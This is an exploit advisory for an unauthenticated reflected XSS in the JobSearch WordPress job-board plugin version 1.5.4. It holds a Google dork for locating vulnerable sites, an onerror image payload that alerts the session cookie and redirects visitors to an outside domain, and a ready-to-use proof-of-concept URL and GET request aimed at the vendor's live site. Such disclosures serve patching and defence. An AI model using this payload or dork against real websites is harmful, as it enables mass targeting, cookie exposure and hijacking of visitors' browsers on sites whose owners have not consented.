[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.4 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-15
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.4
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected XSS vulnerability was discovered in the JobSearch plugin v1.5.4 for WordPress.



### [ Payload: ]

[$] <img src=x onerror=alert(`VLΛDVΞCTOR`);alert(document.cookie);window.location=`https://vladvector.ru`;>



### [ PoC: ]

[!] https://eyecix.com/plugins/jobsearch/?job_type=%3Cimg%20src%3Dx%20onerror%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%3E

[!] GET /plugins/jobsearch/?job_type=%3Cimg%20src%3Dx%20onerror%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%3E HTTP/1.1
Host: eyecix.com



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector